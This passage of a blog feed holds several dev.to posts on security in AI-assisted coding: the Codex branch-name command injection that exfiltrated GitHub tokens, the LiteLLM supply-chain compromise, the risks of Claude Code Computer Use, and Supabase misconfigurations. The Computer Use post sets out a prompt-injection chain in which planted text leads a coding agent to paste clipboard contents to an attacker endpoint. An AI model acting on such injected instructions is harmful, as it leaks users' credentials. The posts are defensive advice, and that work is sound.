&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;pip-audit
pip-audit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This checks your installed packages against known vulnerabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Scan your deployed app
&lt;/h3&gt;

&lt;p&gt;If you shipped a vibe-coded app to production, scan it. Exposed API keys, missing auth, open endpoints -- these are the things attackers look for first.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck on notelon.ai&lt;/a&gt; scans for the most common vibe coding security mistakes. Free, no signup.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bigger Picture
&lt;/h2&gt;

&lt;p&gt;35 CVEs were directly attributed to AI-generated code in March 2026 alone. Up from 15 in February and 6 in January.&lt;/p&gt;

&lt;p&gt;The vibe coding security crisis isn't theoretical anymore. Real attacks are happening against the exact tools and packages vibe coders depend on.&lt;/p&gt;

&lt;p&gt;The builders who scan, pin, and audit will survive. The ones running &lt;code&gt;pip install&lt;/code&gt; with blind trust are one compromised package away from a full credential dump.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Previously: &lt;a href="https://dev.to/solobillions/i-tested-every-vibe-coding-security-scanner-so-you-dont-have-to-2026-3a5o"&gt;I Tested Every Vibe Coding Security Scanner (2026)&lt;/a&gt; -- ranked #3 on Brave for "best vibe coding security scanner"&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>vibecoding</category>
      <category>supplychainattack</category>
      <category>ai</category>
    </item>
    <item>
      <title>This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 22:35:45 +0000</pubDate>
      <link>https://dev.to/solobillions/this-week-in-ai-security-openai-codex-hacked-litellm-supply-chain-attack-claude-gets-computer-55gh</link>
      <guid>https://dev.to/solobillions/this-week-in-ai-security-openai-codex-hacked-litellm-supply-chain-attack-claude-gets-computer-55gh</guid>
      <description>&lt;p&gt;This was the week AI security stopped being theoretical.&lt;/p&gt;

&lt;p&gt;Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. OpenAI Codex: Command Injection via Branch Names
&lt;/h2&gt;

&lt;p&gt;BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting &lt;strong&gt;all Codex users&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.&lt;/p&gt;

&lt;p&gt;The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.&lt;/p&gt;

&lt;p&gt;OpenAI patched it quickly. But the pattern is what matters: &lt;strong&gt;AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes
&lt;/h2&gt;

&lt;p&gt;On March 24, 2026, &lt;code&gt;litellm&lt;/code&gt; version 1.82.8 was published to PyPI with a malicious &lt;code&gt;.pth&lt;/code&gt; file that executed automatically on every Python process startup.&lt;/p&gt;

&lt;p&gt;The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.&lt;/p&gt;

&lt;p&gt;The timeline:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;13 minutes&lt;/strong&gt; between the compromised publish and detection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;47,000 downloads&lt;/strong&gt; before the package was pulled&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;95 million monthly downloads&lt;/strong&gt; for the litellm package overall&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.&lt;/p&gt;

&lt;p&gt;Endor Labs just published their analysis showing this is the &lt;strong&gt;same attacker&lt;/strong&gt; behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Claude Gets Computer Use: The Closed Loop
&lt;/h2&gt;

&lt;p&gt;Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.&lt;/p&gt;

&lt;p&gt;The capability is impressive. The security implications are sobering.&lt;/p&gt;

&lt;p&gt;With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auth middleware actually works&lt;/li&gt;
&lt;li&gt;API keys are properly scoped&lt;/li&gt;
&lt;li&gt;Rate limiting is real&lt;/li&gt;
&lt;li&gt;Environment variables aren't hardcoded&lt;/li&gt;
&lt;li&gt;The dependencies being installed are legitimate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Pattern
&lt;/h2&gt;

&lt;p&gt;All three events share a common thread: &lt;strong&gt;trust boundaries in AI development are poorly defined.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Codex trusted user-supplied branch names as safe input&lt;/li&gt;
&lt;li&gt;Vibe coders trusted &lt;code&gt;pip install litellm&lt;/code&gt; as a safe operation&lt;/li&gt;
&lt;li&gt;Claude Computer Use trusts that the code it wrote is correct because the UI loaded&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Meanwhile, 9to5Mac reports that vibe coding has &lt;strong&gt;broken Apple's App Store review queue&lt;/strong&gt;. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.&lt;/p&gt;

&lt;p&gt;What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.&lt;/p&gt;

&lt;h2&gt;
  
  
  What You Can Do Today
&lt;/h2&gt;

&lt;p&gt;If you're shipping vibe-coded apps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; Use lockfiles. Verify hashes. Don't &lt;code&gt;pip install&lt;/code&gt; without knowing exactly what version you're getting.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Treat AI-generated code as untrusted input.&lt;/strong&gt; Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan before shipping.&lt;/strong&gt; Tools like &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Assume your secrets are exposed.&lt;/strong&gt; If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Add rate limiting to every public endpoint.&lt;/strong&gt; The bots are faster than your users.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The AI coding revolution is real. The security crisis is also real. They're the same thing.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I track vibe coding security tools and incidents at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;. Free scanner, no signup required.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>vibecoding</category>
    </item>
    <item>
      <title>OpenAI Codex Had a Command Injection Bug That Could Steal Your GitHub Tokens</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 20:34:02 +0000</pubDate>
      <link>https://dev.to/solobillions/openai-codex-had-a-command-injection-bug-that-could-steal-your-github-tokens-441j</link>
      <guid>https://dev.to/solobillions/openai-codex-had-a-command-injection-bug-that-could-steal-your-github-tokens-441j</guid>
      <description>&lt;p&gt;BeyondTrust's Phantom Labs just published a report on a command injection vulnerability in OpenAI's Codex. It's patched now, but the attack pattern matters because it's exactly the kind of thing vibe coders won't see coming.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Happened
&lt;/h2&gt;

&lt;p&gt;Codex runs tasks inside managed containers that clone your GitHub repo and authenticate using short-lived OAuth tokens. The vulnerability: branch names weren't sanitized before being passed to shell commands during environment setup.&lt;/p&gt;

&lt;p&gt;An attacker could craft a malicious branch name that injects arbitrary shell commands. Those commands execute inside the container with access to your GitHub token.&lt;/p&gt;

&lt;p&gt;The attack worked across:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The Codex web interface&lt;/li&gt;
&lt;li&gt;The CLI&lt;/li&gt;
&lt;li&gt;The SDK&lt;/li&gt;
&lt;li&gt;IDE integrations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Worse: it could be scaled. Embed a malicious payload in a branch name, and every developer who interacts with that repo through Codex gets compromised.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Could Be Stolen
&lt;/h2&gt;

&lt;p&gt;The GitHub OAuth tokens Codex uses aren't just read tokens. In enterprise environments where Codex has broad permissions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full read/write access&lt;/strong&gt; to repositories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workflow trigger permissions&lt;/strong&gt; (CI/CD pipelines)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Organization-level access&lt;/strong&gt; depending on token scope&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;One compromised branch name. Every Codex user on the repo exposed.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters for Vibe Coders
&lt;/h2&gt;

&lt;p&gt;This vulnerability was found by professional security researchers at BeyondTrust. Most vibe coders:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Don't review branch names for injection payloads&lt;/li&gt;
&lt;li&gt;Don't audit what permissions their AI coding tools have&lt;/li&gt;
&lt;li&gt;Don't know what an OAuth token scope even is&lt;/li&gt;
&lt;li&gt;Trust that "it's a managed container" means it's safe&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attack surface isn't your code. It's your tools.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bigger Picture
&lt;/h2&gt;

&lt;p&gt;This dropped the same day Claude Code launched Computer Use (mouse and keyboard control). Two separate stories, same lesson:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI coding agents are live execution environments with access to your credentials.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;They're not just autocomplete. They run commands, clone repos, access tokens, and now control your screen. Every new capability is a new attack surface.&lt;/p&gt;

&lt;p&gt;In the last 7 days:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;LiteLLM supply chain attack hit 95M monthly downloads (TeamPCP campaign)&lt;/li&gt;
&lt;li&gt;Same attacker compromised Trivy (vulnerability scanner) and KICS (IaC analyzer)&lt;/li&gt;
&lt;li&gt;OpenAI Codex command injection exposed GitHub tokens&lt;/li&gt;
&lt;li&gt;Claude Code gained mouse and keyboard access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The tools we trust to write and test our code are becoming the primary attack vector.&lt;/p&gt;

&lt;h2&gt;
  
  
  What To Do
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Audit your AI tool permissions.&lt;/strong&gt; What repos can Codex access? What scope do the tokens have? Minimize to read-only where possible.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; TeamPCP compromised packages that millions install without version pinning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Don't trust container isolation alone.&lt;/strong&gt; The Codex containers had network access. "Managed" doesn't mean "secure."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scan your deployed apps.&lt;/strong&gt; If you built it with AI tools, scan it before users find what you missed. &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt; is free.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check for exposed secrets.&lt;/strong&gt; Branch names, commit messages, config files. AI tools don't flag these by default.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;OpenAI patched this one. The next vulnerability in the next AI coding tool hasn't been found yet.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;VibeCheck&lt;/a&gt;, a free security scanner for vibe-coded apps. Follow &lt;a href="https://x.com/solobillionsHQ" rel="noopener noreferrer"&gt;@solobillionsHQ&lt;/a&gt; for daily vibe coding security updates.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>openai</category>
    </item>
    <item>
      <title>Claude Code Just Got Mouse and Keyboard Access. Here's What That Means for Security.</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 18:39:15 +0000</pubDate>
      <link>https://dev.to/solobillions/claude-code-just-got-mouse-and-keyboard-access-heres-what-that-means-for-security-3bmd</link>
      <guid>https://dev.to/solobillions/claude-code-just-got-mouse-and-keyboard-access-heres-what-that-means-for-security-3bmd</guid>
      <description>&lt;p&gt;Claude Code launched Computer Use today. In one prompt, Claude can write code, compile it, launch the app, click through the UI, find bugs, fix them, and verify the fix.&lt;/p&gt;

&lt;p&gt;Everyone is celebrating the productivity unlock. Nobody is talking about the new attack surface.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Changed
&lt;/h2&gt;

&lt;p&gt;Before today, Claude Code could read and write files. That's it. A prompt injection from a malicious dependency could write bad code to disk. Annoying, but contained. The blast radius was your filesystem.&lt;/p&gt;

&lt;p&gt;After today, Claude Code can interact with any app you whitelist. Open a browser. Click through a GUI. Type into forms. The blast radius is now anything on your screen.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Same Day, BeyondTrust Drops This
&lt;/h2&gt;

&lt;p&gt;Hours before Anthropic's announcement, BeyondTrust Phantom Labs published a critical vulnerability in OpenAI Codex. The attack: command injection via GitHub branch names in task creation requests. The result: exfiltration of a victim's GitHub tokens to an attacker's C2 server, granting full read/write access to their entire codebase.&lt;/p&gt;

&lt;p&gt;The attack vector was a branch name. Not a malicious file. Not a suspicious dependency. A branch name.&lt;/p&gt;

&lt;p&gt;This is the pattern: AI coding tools inherit trust from user context (GitHub tokens, env variables, API keys) but don't treat that context as a security boundary. The tool is an agent with your credentials.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Computer Use Changes the Threat Model
&lt;/h2&gt;

&lt;p&gt;Anthropic added app-level permissioning, which is the right first step. You whitelist specific apps and choose between look-only and full control. But let's think about what happens when things go wrong.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The old attack chain:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Malicious dependency or compromised MCP plugin&lt;/li&gt;
&lt;li&gt;Prompt injection lands in a file Claude reads&lt;/li&gt;
&lt;li&gt;Claude writes malicious code to disk&lt;/li&gt;
&lt;li&gt;Developer (hopefully) reviews before shipping&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The new attack chain:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Same malicious dependency or MCP plugin&lt;/li&gt;
&lt;li&gt;Same prompt injection&lt;/li&gt;
&lt;li&gt;Claude now has access to whitelisted apps&lt;/li&gt;
&lt;li&gt;"Open browser, navigate to [exfil endpoint], paste clipboard" becomes a real attack path&lt;/li&gt;
&lt;li&gt;No file on disk to review. The action happened in the UI.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attack doesn't need full desktop access. It just needs one whitelisted app.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Confirmation Loop Problem
&lt;/h2&gt;

&lt;p&gt;Everyone is excited about the "closed loop": write code, test it visually, fix bugs. But think about what this loop actually verifies.&lt;/p&gt;

&lt;p&gt;Claude can see: "the button renders correctly." Claude can see: "the page loads without errors."&lt;/p&gt;

&lt;p&gt;Claude cannot see: "this form sends credentials over HTTP." Claude cannot see: "this API endpoint has no auth check." Claude cannot see: "the database query is injectable."&lt;/p&gt;

&lt;p&gt;Security vulnerabilities are invisible in the UI. A page can look perfect in every screenshot while leaking data through every endpoint.&lt;/p&gt;

&lt;p&gt;Worse: the same model that writes the insecure code is now verifying it. That's not a closed loop. It's a confirmation loop. You need an adversarial check, not a self-review.&lt;/p&gt;

&lt;p&gt;"Claude tested it and it works" is about to become the new "it compiles, ship it."&lt;/p&gt;

&lt;h2&gt;
  
  
  The LiteLLM Supply Chain Attack Is Still Fresh
&lt;/h2&gt;

&lt;p&gt;One week ago, the LiteLLM supply chain attack hit 47K downloads in 46 minutes. The same attacker (TeamPCP) had already compromised Trivy and Telnyx. Malware hidden in a WAV file using steganography. MsBuild compiling inline C# at runtime. XOR-encoded payloads with no signatures to match.&lt;/p&gt;

&lt;p&gt;These are packages that vibe coders &lt;code&gt;pip install&lt;/code&gt; without lockfiles or hash pinning. 88% of LiteLLM's pip installs had no version pinning.&lt;/p&gt;

&lt;p&gt;Now imagine that same compromised package running on a machine where Claude has Computer Use enabled. The injection doesn't just write to files anymore. It can interact with your apps.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Should You Actually Do?
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Whitelist the minimum.&lt;/strong&gt; Don't add apps you don't need Claude to test. Every whitelisted app is attack surface.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Use look-only mode&lt;/strong&gt; when you don't need click-and-type. If Claude only needs to verify visual layout, it doesn't need to click.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Don't trust the closed loop for security.&lt;/strong&gt; Claude verifying its own output catches UI bugs, not security holes. Run a separate security check with a different tool or different model.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin your dependencies.&lt;/strong&gt; Use lockfiles. Use hash verification. The supply chain is the entry point for most of these attacks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Check what Claude is reading.&lt;/strong&gt; If a malicious file lands in your project (through a compromised dependency, a PR, or an MCP plugin), Claude will read it. With Computer Use, it can now act on it.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  This Isn't Anti-Progress
&lt;/h2&gt;

&lt;p&gt;Computer Use in Claude Code is genuinely useful. Being able to visually verify what you build eliminates an entire class of "works in terminal, broken in browser" bugs.&lt;/p&gt;

&lt;p&gt;But capability and attack surface are the same thing. Every new thing an AI agent can do is also a new thing an attacker can make it do, if they can inject the right prompt.&lt;/p&gt;

&lt;p&gt;The security conversation needs to keep pace with the capability conversation. Right now, it's not even close.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I track vibe coding security tools, vulnerabilities, and the evolving threat landscape. Free security scanner at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>claudecode</category>
    </item>
    <item>
      <title>I Scanned 30 Lovable Apps This Month. Here Are the 5 Security Issues I Found in Almost Every One</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Mon, 30 Mar 2026 02:02:44 +0000</pubDate>
      <link>https://dev.to/solobillions/i-scanned-30-lovable-apps-this-month-here-are-the-5-security-issues-i-found-in-almost-every-one-4k6j</link>
      <guid>https://dev.to/solobillions/i-scanned-30-lovable-apps-this-month-here-are-the-5-security-issues-i-found-in-almost-every-one-4k6j</guid>
      <description>&lt;p&gt;I run security scans on vibe-coded apps. This month I looked at 30 apps built with Lovable, and the same five issues appeared in nearly every one.&lt;/p&gt;

&lt;p&gt;These are not theoretical risks. They are things any user with browser DevTools could exploit in under five minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Supabase RLS policies that check role instead of ownership
&lt;/h2&gt;

&lt;p&gt;This was in roughly 80% of apps that use Supabase.&lt;/p&gt;

&lt;p&gt;The AI generates a Row Level Security policy like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means any logged-in user can read every row in the table. Not just their own. Every user's data.&lt;/p&gt;

&lt;p&gt;The fix is one function call: &lt;code&gt;auth.uid() = user_id&lt;/code&gt; instead of &lt;code&gt;auth.role() = 'authenticated'&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I wrote a &lt;a href="https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e"&gt;full guide on checking and fixing this&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Supabase anon key + service role key in the JavaScript bundle
&lt;/h2&gt;

&lt;p&gt;Every Lovable app that uses Supabase ships the anon key in the client bundle. That part is expected and documented by Supabase.&lt;/p&gt;

&lt;p&gt;The problem: about 1 in 5 apps I scanned also had the &lt;strong&gt;service role key&lt;/strong&gt; in the client bundle. The service role key bypasses all RLS policies. If someone extracts it from your JavaScript (which takes about 30 seconds with DevTools), they have full read/write access to every table.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open your deployed app. View page source. Search for &lt;code&gt;eyJ&lt;/code&gt; (the start of a base64-encoded JWT). You should find exactly one key (the anon key). If you find two, the second is probably your service role key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Move any server-side logic that uses the service role key into a Supabase Edge Function or server-side API route. Never import the service role key in client code.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. No email verification required
&lt;/h2&gt;

&lt;p&gt;Lovable apps typically set up Supabase Auth with email + password. The AI generates the signup flow, the login flow, and the protected routes.&lt;/p&gt;

&lt;p&gt;What it does not generate: email verification.&lt;/p&gt;

&lt;p&gt;This means anyone can sign up with any email address (including addresses they do not own) and immediately access the app. Combined with the RLS issue from #1, they can also read every other user's data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Go to your Supabase dashboard &amp;gt; Authentication &amp;gt; Settings &amp;gt; Email. Look for "Enable email confirmations." If it is off, anyone can sign up with a fake email.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Enable email confirmations in Supabase. Then update your app's auth flow to handle the "check your email" state between signup and confirmation.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. API keys for third-party services in environment variables that get bundled
&lt;/h2&gt;

&lt;p&gt;This goes beyond Supabase. If your Lovable app uses OpenAI, Stripe, SendGrid, or any other service with an API key, check where that key lives.&lt;/p&gt;

&lt;p&gt;Lovable apps built with Vite expose any environment variable that starts with &lt;code&gt;VITE_&lt;/code&gt; to the client bundle. If your OpenAI key is stored as &lt;code&gt;VITE_OPENAI_API_KEY&lt;/code&gt;, it ships to every user's browser.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open DevTools &amp;gt; Sources &amp;gt; find your compiled JS files &amp;gt; search for your key prefix or the string &lt;code&gt;sk-&lt;/code&gt; (OpenAI) or &lt;code&gt;SG.&lt;/code&gt; (SendGrid).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Any key that costs money when called (OpenAI, Stripe secret key, SendGrid) must live on the server side only. Create a Supabase Edge Function or backend API that proxies the request.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. No rate limiting on authentication endpoints
&lt;/h2&gt;

&lt;p&gt;None of the 30 apps I scanned had rate limiting on their auth endpoints. This means an attacker can attempt unlimited password guesses, send unlimited password reset emails, or create unlimited accounts.&lt;/p&gt;

&lt;p&gt;Supabase has built-in rate limiting for auth, but the defaults are generous and the AI never tightens them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to check:&lt;/strong&gt; Open Supabase dashboard &amp;gt; Authentication &amp;gt; Rate Limits. Look at the current settings.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Set rate limits that make sense for your app. For most apps: 5 signups per hour per IP, 10 login attempts per hour per IP, 3 password reset emails per hour per email.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why these keep appearing
&lt;/h2&gt;

&lt;p&gt;The pattern is consistent: Lovable (and other AI tools) optimize for "the feature works" not "the feature is secure." Every one of these apps worked correctly. Users could sign up, log in, and use every feature. The security gaps were invisible during normal use.&lt;/p&gt;

&lt;p&gt;The AI does not add security controls unless you specifically prompt it to. And most builders do not know what to prompt for because they are not security experts. That is the whole point of vibe coding.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;If you have a Lovable app with real users:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Run the Supabase RLS check from issue #1 right now. It takes 2 minutes.&lt;/li&gt;
&lt;li&gt;Search your client bundle for &lt;code&gt;eyJ&lt;/code&gt; and count the JWT tokens. If there are more than one, you have a problem.&lt;/li&gt;
&lt;li&gt;Search for &lt;code&gt;sk-&lt;/code&gt; and &lt;code&gt;SG.&lt;/code&gt; in your bundle.&lt;/li&gt;
&lt;li&gt;Check your auth email verification setting.&lt;/li&gt;
&lt;li&gt;Review your rate limits.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We built free scanning tools at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; that automate checks 2-4. No signup required.&lt;/p&gt;

&lt;p&gt;If you want a human review covering all five issues plus business logic, auth flows, and API design, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 security audit&lt;/a&gt; covers 50+ checks with a PDF report and fix instructions.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Part of the &lt;a href="https://dev.to/solobillions"&gt;Vibe Coding Security series&lt;/a&gt;. Updated weekly with new findings.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>lovable</category>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Your Supabase RLS Is Probably Wrong: A Security Guide for Vibe Coders</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sun, 29 Mar 2026 21:36:30 +0000</pubDate>
      <link>https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e</link>
      <guid>https://dev.to/solobillions/your-supabase-rls-is-probably-wrong-a-security-guide-for-vibe-coders-3l4e</guid>
      <description>&lt;p&gt;You built your app with Lovable, Cursor, or Bolt. You connected Supabase. You enabled Row Level Security because the docs said to.&lt;/p&gt;

&lt;p&gt;Your RLS is probably wrong.&lt;/p&gt;

&lt;p&gt;I have scanned dozens of vibe-coded apps this month. The same RLS mistake appears in roughly 80% of them. The app works perfectly. Every feature functions. Users can sign up, create data, view their data. And every user can also view every other user's data.&lt;/p&gt;

&lt;h2&gt;
  
  
  The mistake
&lt;/h2&gt;

&lt;p&gt;Here is what AI-generated RLS policies typically look like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
